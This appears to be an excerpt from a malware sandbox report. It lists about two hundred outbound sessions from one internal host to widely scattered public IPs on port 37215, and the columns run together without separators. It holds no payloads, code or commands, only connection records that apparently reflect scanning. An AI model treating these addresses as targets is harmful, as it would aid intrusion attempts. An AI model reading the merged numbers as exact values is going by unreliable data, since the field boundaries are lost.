                                                  4898192.168.2.1344942157.192.51.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4899192.168.2.1359264157.224.163.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4900192.168.2.133777841.134.41.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4901192.168.2.1349430108.52.188.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4902192.168.2.1334598157.13.96.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4903192.168.2.134299241.82.190.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4904192.168.2.1339600197.247.239.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4905192.168.2.133430041.167.182.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4906192.168.2.135656041.179.64.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4907192.168.2.1357978197.164.60.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4908192.168.2.1342984197.56.161.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4909192.168.2.1352688197.75.61.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4910192.168.2.1351722197.226.29.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4911192.168.2.1337328157.28.153.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4912192.168.2.1336380157.101.73.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4913192.168.2.1347106135.157.206.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4914192.168.2.1352250197.46.117.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4915192.168.2.1334704115.243.37.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4916192.168.2.1353236157.217.94.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4917192.168.2.1336254201.243.18.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4918192.168.2.1337258197.242.63.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4919192.168.2.1347300197.86.87.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4920192.168.2.1352760157.37.108.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4921192.168.2.1355360157.164.183.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4922192.168.2.1358932157.157.55.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4923192.168.2.135317641.241.70.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4924192.168.2.134243841.228.220.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4925192.168.2.1356044197.244.148.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4926192.168.2.1340794197.184.131.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4927192.168.2.136014659.8.71.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4928192.168.2.1354692185.2.180.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4929192.168.2.134066863.188.234.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4930192.168.2.1347178207.68.175.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4931192.168.2.1350648157.42.173.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4932192.168.2.133665841.138.122.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4933192.168.2.133330841.46.241.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4934192.168.2.1339652197.42.171.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4935192.168.2.1340112157.33.222.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4936192.168.2.136001241.217.31.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4937192.168.2.1351886157.139.131.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4938192.168.2.13415548.40.99.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4939192.168.2.133727841.49.170.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4940192.168.2.1357452157.138.48.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4941192.168.2.1335668197.165.204.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4942192.168.2.135892237.59.68.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4943192.168.2.135535641.51.204.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4944192.168.2.1357914197.38.141.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4945192.168.2.1344236197.58.38.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4946192.168.2.1343112157.129.165.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4947192.168.2.1353136157.239.106.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4948192.168.2.135412841.204.4.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4949192.168.2.1345906173.123.192.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4950192.168.2.1335836157.74.199.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4951192.168.2.1351340157.189.39.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4952192.168.2.1357702197.4.190.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4953192.168.2.1337914157.59.165.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4954192.168.2.1352940157.147.203.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4955192.168.2.1338238157.42.51.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4956192.168.2.1348164197.127.91.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4957192.168.2.134143241.195.222.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4958192.168.2.1349824157.127.96.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4959192.168.2.1354716157.53.192.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4960192.168.2.1346876157.159.206.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4961192.168.2.1338794157.52.186.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4962192.168.2.1337120157.153.225.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4963192.168.2.1344172197.176.173.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4964192.168.2.1335518197.200.72.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4965192.168.2.1344424157.87.130.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4966192.168.2.1354118197.177.104.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4967192.168.2.1339890117.78.23.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4968192.168.2.1334834197.171.98.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4969192.168.2.133698064.251.72.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4970192.168.2.1339984197.69.22.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4971192.168.2.1343252179.201.177.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4972192.168.2.1347552197.89.83.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4973192.168.2.1334272197.90.247.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4974192.168.2.133815641.85.84.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4975192.168.2.1359566197.137.152.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4976192.168.2.1347430157.201.172.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4977192.168.2.134127241.190.151.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4978192.168.2.1339680157.39.49.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4979192.168.2.1356986150.160.45.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4980192.168.2.1337988157.67.0.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4981192.168.2.133432241.163.73.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4982192.168.2.1345250157.247.255.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4983192.168.2.1338994197.233.33.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4984192.168.2.135654841.178.98.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4985192.168.2.134280441.130.167.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4986192.168.2.1343852157.163.166.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4987192.168.2.1342064197.196.167.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4988192.168.2.133897462.173.37.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4989192.168.2.1357560197.70.254.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4990192.168.2.133606641.47.172.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4991192.168.2.133404486.240.163.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4992192.168.2.1357114157.117.95.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4993192.168.2.1354600174.240.141.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4994192.168.2.1337628197.90.41.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4995192.168.2.1334768116.120.169.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4996192.168.2.1360780197.138.124.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4997192.168.2.134092843.193.13.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4998192.168.2.1346872197.47.34.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4999192.168.2.134620841.100.108.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5000192.168.2.1341688157.15.183.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5001192.168.2.1358310197.7.36.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5002192.168.2.1336834109.156.129.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5003192.168.2.135886441.205.58.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5004192.168.2.1351442197.59.162.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5005192.168.2.1342200107.166.255.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5006192.168.2.1345350197.4.183.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5007192.168.2.1333186197.174.195.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5008192.168.2.1346364102.212.210.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5009192.168.2.135560041.112.177.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5010192.168.2.1338346157.198.252.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5011192.168.2.1340406157.56.20.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5012192.168.2.1350020157.173.7.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5013192.168.2.1342418157.151.221.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5014192.168.2.1338002197.70.105.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5015192.168.2.1340766103.210.60.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5016192.168.2.1334722197.244.121.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5017192.168.2.1343088197.238.18.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5018192.168.2.136065241.203.88.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5019192.168.2.1347472219.175.69.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5020192.168.2.1348548157.37.226.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5021192.168.2.1345204157.160.162.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5022192.168.2.1334014138.185.49.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5023192.168.2.1352412197.103.56.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5024192.168.2.1345268197.126.134.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5025192.168.2.134015441.69.17.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5026192.168.2.1356126157.49.70.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5027192.168.2.1360580157.104.207.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5028192.168.2.1341080197.189.155.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5029192.168.2.1351004197.96.15.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5030192.168.2.1353432197.37.57.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5031192.168.2.1337244197.228.164.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5032192.168.2.133346241.160.142.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5033192.168.2.1347720157.190.11.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5034192.168.2.1339364157.114.109.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5035192.168.2.1339780197.201.129.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5036192.168.2.1339626197.92.102.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5037192.168.2.1343078197.222.248.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5038192.168.2.1348222197.80.212.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5039192.168.2.1348998157.166.105.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5040192.168.2.1359628102.86.178.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5041192.168.2.1338732157.208.118.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5042192.168.2.1352882157.112.178.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5043192.168.2.1350344197.79.128.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5044192.168.2.1345546197.154.123.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5045192.168.2.1336026197.40.168.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5046192.168.2.1353874157.92.210.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5047192.168.2.1348758161.225.199.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5048192.168.2.1342088157.102.117.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5049192.168.2.1346422197.100.176.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5050192.168.2.134400641.127.215.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5051192.168.2.1351988197.253.215.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5052192.168.2.135280641.95.202.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5053192.168.2.133606641.165.44.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5054192.168.2.1347360124.106.222.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5055192.168.2.135644841.89.140.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5056192.168.2.133824441.59.242.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5057192.168.2.1357432197.41.93.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5058192.168.2.134680648.229.71.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5059192.168.2.135339441.131.74.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5060192.168.2.1360728197.174.108.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5061192.168.2.1337478197.224.115.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5062192.168.2.1355012197.172.132.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5063192.168.2.1349300157.91.177.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5064192.168.2.1334152157.102.221.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5065192.168.2.1355234182.44.17.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5066192.168.2.1352526159.36.241.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5067192.168.2.135587441.165.8.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5068192.168.2.1353624184.50.4.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5069192.168.2.1360350197.131.118.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5070192.168.2.1356400197.77.249.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5071192.168.2.134475241.136.72.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5072192.168.2.1347028197.167.239.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5073192.168.2.13446044.32.183.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5074192.168.2.1348356157.62.152.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5075192.168.2.1343186157.110.101.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5076192.168.2.13339565.86.68.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5077192.168.2.1353110109.235.9.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5078192.168.2.1333570157.93.63.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5079192.168.2.1337706220.193.36.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5080192.168.2.133516841.110.73.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5081192.168.2.1338968197.118.147.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5082192.168.2.1345764197.52.158.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5083192.168.2.1340350197.7.195.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5084192.168.2.133735041.23.79.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5085192.168.2.1358644197.55.15.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5086192.168.2.1340796197.230.113.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5087192.168.2.133936241.183.43.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5088192.168.2.1357568208.232.101.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5089192.168.2.1358218197.207.103.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5090192.168.2.1334036197.1.251.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5091192.168.2.1337018197.192.254.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5092192.168.2.1351244157.26.117.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5093192.168.2.1357920157.232.115.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5094192.168.2.1353916157.96.23.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5095192.168.2.135455841.3.234.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5096192.168.2.1335914157.61.130.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5097192.168.2.1346488197.55.230.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5098192.168.2.135821841.120.24.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5099192.168.2.1348222157.46.45.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5100192.168.2.1345982198.135.20.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5101192.168.2.1353888157.167.200.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5102192.168.2.1334190217.127.46.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5103192.168.2.1335970197.230.165.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5104192.168.2.134427441.237.166.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5105192.168.2.134232241.157.142.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5106192.168.2.134182882.177.87.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
